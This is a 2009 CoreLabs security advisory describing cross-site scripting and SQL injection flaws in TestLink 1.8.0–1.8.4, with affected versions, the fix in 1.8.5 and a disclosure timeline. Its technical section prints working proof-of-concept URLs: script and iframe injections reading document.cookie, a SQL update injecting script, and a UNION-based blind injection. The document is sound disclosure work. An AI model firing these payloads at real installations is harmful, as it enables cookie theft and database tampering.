Skip to content
cyberexploits
webappphptext

TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities

TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities

Published on 2009-12-09

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/10364.txt7eac4c3a
raw
                                Core Security Technologies - CoreLabs

Advisory

                                        

http://www.coresecurity.com/corelabs/



Multiple XSS and Injection Vulnerabilities in TestLink Test Management

and Execution System





1. *Advisory Information*



Title: Multiple XSS and Injection Vulnerabilities in TestLink Test

Management and Execution System

Advisory Id: CORE-2009-1013

Advisory URL:

http://www.coresecurity.com/content/testlink-multiple-injection-vulnerabilities

Date published: 2009-12-09

Date of last update: 2009-12-09

Vendors contacted: TestLink Community

Release mode: Coordinated release





2. *Vulnerability Information*



Class: Cross site scripting [CWE-79], SQL injection [CWE-89]

Impact: Code execution

Remotely Exploitable: Yes

Locally Exploitable: No

Bugtraq ID: 37258

CVE Name: CVE-2009-4237, CVE-2009-4238





3. *Vulnerability Description*



 Multiple injection (both XSS [1] and SQL) vulnerabilities have been

discovered in Testlink [2], a widely used test-case management

application written in PHP [3]. One of the XSS vulnerabilities,

discovered in its login screen, can be exploited without an

authenticated session.





4. *Vulnerable packages*



   . TestLink 1.8.0

   . TestLink 1.8.1

   . TestLink 1.8.2

   . TestLink 1.8.3

   . TestLink 1.8.4

   . Older versions are probably affected too, but they were not checked.





5. *Non-vulnerable packages*



   . TestLink 1.8.5





6. *Solutions and Workarounds*



 Upgrade to a non-vulnerable version, such as 1.8.5. TestLink features

the option to upgrade a current installation in its install scripts.





7. *Credits*



 These vulnerabilities were discovered and researched by Pablo

Annetta, from Core Security Technologies, during Core Bugweek 2009 as

a member of the "Los Herederos de Don Pablo (HDP)" team.





8. *Technical Description / Proof of Concept Code*



 Most of these vulnerabilities are present in the Testlink code

because the logic for the sanitization of user input is rudimentary.

Each script sanitizes its own input, instead of abstracting this task

to another layer of logic. Often only slashes are stripped, but html

entities are almost never escaped.



 The only vulnerability in this report that can be exploited without

an authenticated session is a XSS vulnerability in Testlink's login

page 'login.php'. This script gets a parameter named 'req', which is

used by the application to set the next request to be made. All

parameters are initialized in the 'init_args' function which doesn't

sanitize its arguments appropriately as seen below.



/-----

function init_args()

{

    $args = new stdClass();

    $_REQUEST = strings_stripSlashes($_REQUEST);

    

    $args->note = isset($_REQUEST['note']) ? $_REQUEST['note'] : null;

    $args->login = isset($_REQUEST['tl_login']) ?

trim($_REQUEST['tl_login']) : null;

    $args->pwd = isset($_REQUEST['tl_password']) ?

$_REQUEST['tl_password'] : null;



    $args->reqURI = isset($_REQUEST['req']) ? $_REQUEST['req'] : null;

    $args->preqURI = (isset($_REQUEST['reqURI']) &&

strlen($_REQUEST['reqURI'])) ? $_REQUEST['reqURI'] : null;

 

    return $args;

}

- -----/



 This vulnerability can be verified by issuing the following request

to a Testlink installation on localhost:



/-----

http://127.0.0.1/testlink/login.php?req=";><iframe src

="http://www.coresecurity.com/content/xxxx"; width="100%"

height="300"></iframe>

- -----/





 Other XSS vulnerabilities on different scripts can be exploited with

an authenticated session. Proof of concept code follows:



/-----

http://127.0.0.1/testlink/lib/general/staticPage.php?key=";><script>alert(document.cookie)</script>



http://127.0.0.1/testlink/lib/attachments/attachmentupload.php?id=1&tableName='<script>alert(document.cookie)</script>

http://127.0.0.1/testlink/lib/events/eventviewer.php?startDate=";<script>alert(document.cookie)</script>

http://127.0.0.1/testlink/lib/events/eventviewer.php?endDate=";<script>alert(document.cookie)</script>

http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=";<script>alert(document.cookie)</script>

- -----/





 There are more XSS attacks that can be executed with *an

authenticated session* on installations that have *at least one test

plan created*. Most of these are due to an 'echo' statement in

TestLink's database functions that directly outputs SQL errors back to

the browser without escaping html entities. This can be found on line

181 of 'testlink/lib/functions/database.class.php', where some

function such as 'htmlspecialchars' should be called on '

$this->error($p_query)' and '$message'. A templating engine (TestLink

uses Smarty for many other tasks) could also be used to output these

errors.



/-----

if ( !$t_result ) {

    echo "ERROR ON exec_query() - database.class.php <br>" .

$this->error($p_query) . "<br>";

  echo "<br> THE MESSAGE :: $message. "<br>";

    return false;

} else {

    return $t_result;

}

- -----/



 This proof of concept code triggers the vulnerabilities described above:



/-----

http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&expected_results='<script>alert(document.cookie)</script>

http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&name=<script>alert(document.cookie)</script>

http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&steps=<script>alert(document.cookie)</script>

http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='<script>alert(document.cookie)</script>

- -----/



 More XSS vulnerabilities can also be triggered because of the problem

described above, but also because another independent XSS exists on

'resultsMoreBuilds_buildReport.php' caused by not escaping the

'search_notes_string', by issuing this request (also when logged into

an installation with a Test Plan created):



/-----

http://127.0.0.1/testlink/lib/results/resultsMoreBuilds_buildReport.php?report_type=0&display_query_params=1&search_notes_string=</td><script>alert(document.cookie)</script>

- -----/





 With an authenticated session, the following SQL injection bug can

also be exploited.



 In 'http://127.0.0.1/testlink/lib/general/navBar.php', filling in the

'Test Case ID' field with 'TC-1 or 1 = 1 update tcversions set summary

= '</td><script>alert(document.cookie)</script><td>'' results in

reflected HTML.



 Also with an authenticated session the following blind SQL injection

exists



/-----

http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=1,1)%20union%20SELECT%20id%20FROM%20testplans%20%23

- -----/





9. *Report Timeline*



. 2009-10-29:

Core Security Technologies notifies Toshiyuki Kawanishi (at his

@users.sourceforge.jp address) from the Teamst team of the

vulnerabilities, offering a draft for this advisory in plaintext or

encrypted form (if proper keys are sent). November 9th, 2009, is

proposed as a release date.



. 2009-11-02:

Because no response was obtained from Toshiyuki at his

@users.sourceforge.jp, Core Security Technologies tries to contact him

using the "Contact" webform in http://www.teamst.org.



. 2009-11-09:

Since there is still no reply from Toshiyuki, Core now tries

contacting Francisco Mancardi. November 23rd is now proposed as a

release date.



. 2009-11-09:

Francisco Mancardi replies asking that a copy in plaintext of the

advisory be sent to him, and also to Toshiyuki Kawanishi and Martin

Havlat.



. 2009-11-09:

Core sends a draft for this advisory, including the technical

description of the vulnerabilities, to Francisco Mancardi, Toshiyuki

Kawanishi and Martin Havlat.



. 2009-11-10:

Martin Havlat replies acknowledging reception of the advisory draft,

and tells Core that internal issue #2947 has been created in their bug

tracking system to fix these bugs. He mentions these issues shall be

fixed on release 1.8.5 of TestLink.



. 2009-11-12:

Core replies asking for more information regarding the release date of

TestLink 1.8.5. An account is created by Core in TestLink's internal

bug tracking system to access information about issue #2947.



. 2009-11-17:

Core requests again information regarding the release date of TestLink

1.8.5 in order to schedule the release of this advisory accordingly,

since no reply on this has been yet given by the TestLink developers

contacted. Core also mentions that issue #2947 cannot be accessed by

the user created in order to follow the development of a patch for the

vulnerabilities reported here.



. 2009-11-17:

Francisco Mancardi replies specifying that "maybe [issue #2947] has

private status".



. 2009-11-20:

Core asks once more for a release date for a fixed version of

TestLink. The advisory is rescheduled for release on Monday 30th,

November, since there is no information regarding the possibility of

meeting the deadline of Monday 23rd by the TestLink team. Core also

mentions that they are eager to passively monitor the progress of the

TestLink developers in fixing these issues if access is given to issue

#2947 to their created account on TestLink's bug tracking system.



. 2009-11-26:

Since there was no reply to their last e-mail, Core resends it,

reminding the developers that their planned release date for the

advisory is Monday 30th, and that they would like to know if there is

a planned release date for a fixed version of TestLink. Core reminds

the developers about their commitment in helping them in correctly

fixing the bug, should they get access to private issue #2947.



. 2009-11-27:

Martin Havlat replies that due to priorities in the internal

development group of Testlink the bug has not yet been fixed. He

commits to release TestLink 1.8.5 as soon as this bug is fixed, but

besides stating that he wished to have time to fix this himself, no

firm or verifiable claim is made that can assure Core of a planned fix

and release.



. 2009-11-27:

Core reschedules its internal publication date for this advisory to

December 14th. This will be the final date and a user-release will be

made, unless TestLink developers share information that can be

verified by Core that shows commitment to eventually looking into said

bugs and fixing them. Core suggests that developers actually in charge

of these issues are copied in the e-mail loop, or that access to

internal issue-tracking tools be given to them to actively participate

in the discussions and the patching process.



. 2009-11-30:

Martin Havlat asks for technical details needed by him to confirm some

of these vulnerabilities.



. 2009-12-01:

Core replies with the technical details needed by Martin Havlat.



. 2009-12-02:

Martin Havlat sends a patched version of TestLink to Core asking for

verification of fixes to some of the vulnerabilities reported in this

advisory.



. 2009-12-03:

Core replies saying that the fixes proposed by Martin Havlat fail to

patch those specific vulnerabilities. The bugs are further researched

by Core and the advisory draft is modified to include a more detailed

explanation of these bugs. This technical information is shared by

Core with Martin Havlat and some insight into possible fixes is also

given.



. 2009-12-09:

TestLink 1.8.5 is released.



. 2009-12-09:

Advisory CORE-2009-1013 is published.





10. *References*



[1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

[2] http://www.teamst.org/

[3] http://www.owasp.org/index.php/PHP_Top_5





11. *About CoreLabs*



CoreLabs, the research center of Core Security Technologies, is

charged with anticipating the future needs and requirements for

information security technologies. We conduct our research in several

important areas of computer security including system vulnerabilities,

cyber attack planning and simulation, source code auditing, and

cryptography. Our results include problem formalization,

identification of vulnerabilities, novel solutions and prototypes for

new technologies. CoreLabs regularly publishes security advisories,

technical papers, project information and shared software tools for

public use at: http://www.coresecurity.com/corelabs.





12. *About Core Security Technologies*



Core Security Technologies develops strategic solutions that help

security-conscious organizations worldwide develop and maintain a

proactive process for securing their networks. The company's flagship

product, CORE IMPACT, is the most comprehensive product for performing

enterprise security assurance testing. CORE IMPACT evaluates network,

endpoint and end-user vulnerabilities and identifies what resources

are exposed. It enables organizations to determine if current security

investments are detecting and preventing attacks. Core Security

Technologies augments its leading technology solution with world-class

security consulting services, including penetration testing and

software security auditing. Based in Boston, MA and Buenos Aires,

Argentina, Core Security Technologies can be reached at 617-399-6980

or on the Web at http://www.coresecurity.com.





13. *Disclaimer*



The contents of this advisory are copyright (c) 2009 Core Security

Technologies and (c) 2009 CoreLabs, and may be distributed freely

provided that no fee is charged for this distribution and proper

credit is given.

View on GitHub